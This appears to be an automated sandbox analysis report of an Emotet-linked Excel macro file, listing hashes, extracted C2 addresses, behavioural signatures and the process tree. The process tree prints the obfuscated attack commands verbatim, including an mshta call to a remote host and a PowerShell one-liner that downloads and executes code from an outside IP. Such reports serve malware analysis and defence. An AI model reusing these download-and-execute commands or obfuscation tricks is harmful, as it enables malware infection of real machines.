Analysis
-
max time kernel
151s -
max time network
145s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
20-01-2022 04:11
Behavioral task
behavioral1
Sample
3b4c7690fa48369fdc9a684e697c5ba23a23d5e89955484364a79fc0e74c99de.xlsm
Resource
win10-en-20211208
General
-
Target
3b4c7690fa48369fdc9a684e697c5ba23a23d5e89955484364a79fc0e74c99de.xlsm
-
Size
115KB
-
MD5
48904e8844874c95e6ab3513f7374aca
-
SHA1
b341da5b22ab387ac0a34a39f508702f8fbe8bc0
-
SHA256
3b4c7690fa48369fdc9a684e697c5ba23a23d5e89955484364a79fc0e74c99de
-
SHA512
c9d6b0e8a7e6093aa12cd634eabf9f7eb93ce21d611c8718e1656ee754d468b32282117d14275cb6737bc81dc1bd277443c201e8061acbd697c2ac5492e13a03
Malware Config
Extracted
http://0x5cff39c3/sec/se1.html
Extracted
http://92.255.57.195/sec/se1.png
Extracted
emotet
Epoch5
45.138.98.34:80
69.16.218.101:8080
51.210.242.234:8080
185.148.168.220:8080
142.4.219.173:8080
54.38.242.185:443
191.252.103.16:80
104.131.62.48:8080
62.171.178.147:8080
217.182.143.207:443
168.197.250.14:80
37.44.244.177:8080
66.42.57.149:443
210.57.209.142:8080
159.69.237.188:443
116.124.128.206:8080
128.199.192.135:8080
195.154.146.35:443
185.148.168.15:8080
195.77.239.39:8080
207.148.81.119:8080
85.214.67.203:8080
190.90.233.66:443
78.46.73.125:443
78.47.204.80:443
37.59.209.141:8080
54.37.228.122:443
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3688 3788 cmd.exe EXCEL.EXE -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 35 4020 mshta.exe 41 1328 powershell.exe 43 1328 powershell.exe 49 1808 rundll32.exe 50 1808 rundll32.exe 52 1808 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 1788 rundll32.exe 3304 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Ttgvbgb\bzrlctr.fbn rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1952 4020 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3788 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid process 1328 powershell.exe 1328 powershell.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1952 WerFault.exe 1328 powershell.exe 1808 rundll32.exe 1808 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 1952 WerFault.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
Processes:
EXCEL.EXEpid process 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE 3788 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
EXCEL.EXEcmd.exemshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 3788 wrote to memory of 3820 3788 EXCEL.EXE splwow64.exe PID 3788 wrote to memory of 3820 3788 EXCEL.EXE splwow64.exe PID 3788 wrote to memory of 3688 3788 EXCEL.EXE cmd.exe PID 3788 wrote to memory of 3688 3788 EXCEL.EXE cmd.exe PID 3688 wrote to memory of 4020 3688 cmd.exe mshta.exe PID 3688 wrote to memory of 4020 3688 cmd.exe mshta.exe PID 4020 wrote to memory of 1328 4020 mshta.exe powershell.exe PID 4020 wrote to memory of 1328 4020 mshta.exe powershell.exe PID 1328 wrote to memory of 1812 1328 powershell.exe cmd.exe PID 1328 wrote to memory of 1812 1328 powershell.exe cmd.exe PID 1812 wrote to memory of 1788 1812 cmd.exe rundll32.exe PID 1812 wrote to memory of 1788 1812 cmd.exe rundll32.exe PID 1812 wrote to memory of 1788 1812 cmd.exe rundll32.exe PID 1788 wrote to memory of 3304 1788 rundll32.exe rundll32.exe PID 1788 wrote to memory of 3304 1788 rundll32.exe rundll32.exe PID 1788 wrote to memory of 3304 1788 rundll32.exe rundll32.exe PID 3304 wrote to memory of 3644 3304 rundll32.exe rundll32.exe PID 3304 wrote to memory of 3644 3304 rundll32.exe rundll32.exe PID 3304 wrote to memory of 3644 3304 rundll32.exe rundll32.exe PID 3644 wrote to memory of 1808 3644 rundll32.exe rundll32.exe PID 3644 wrote to memory of 1808 3644 rundll32.exe rundll32.exe PID 3644 wrote to memory of 1808 3644 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\3b4c7690fa48369fdc9a684e697c5ba23a23d5e89955484364a79fc0e74c99de.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:3820
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\system32\mshta.exemshta http://0x5cff39c3/sec/se1.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ttgvbgb\bzrlctr.fbn",kRFdT8⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ttgvbgb\bzrlctr.fbn",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1808 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4020 -s 16684⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ac08bf753f0a2ef33379a522771fac41
SHA1fbe34adc7a30720ff3953b4dbf6bc12fa9ff9ecb
SHA256e2c4e4c320d4e2744d5818db57375a1959625c31e96a934461c1112188424755
SHA51210784210311da64f956f89f48d00a20e5287fa48ddde7a4d51f9c35710c4f57706e18984c67275cfee1b6d5f629bf44096a227e0a945c73985ad3a38bd677b33
-
MD5
ac08bf753f0a2ef33379a522771fac41
SHA1fbe34adc7a30720ff3953b4dbf6bc12fa9ff9ecb
SHA256e2c4e4c320d4e2744d5818db57375a1959625c31e96a934461c1112188424755
SHA51210784210311da64f956f89f48d00a20e5287fa48ddde7a4d51f9c35710c4f57706e18984c67275cfee1b6d5f629bf44096a227e0a945c73985ad3a38bd677b33
-
MD5
ac08bf753f0a2ef33379a522771fac41
SHA1fbe34adc7a30720ff3953b4dbf6bc12fa9ff9ecb
SHA256e2c4e4c320d4e2744d5818db57375a1959625c31e96a934461c1112188424755
SHA51210784210311da64f956f89f48d00a20e5287fa48ddde7a4d51f9c35710c4f57706e18984c67275cfee1b6d5f629bf44096a227e0a945c73985ad3a38bd677b33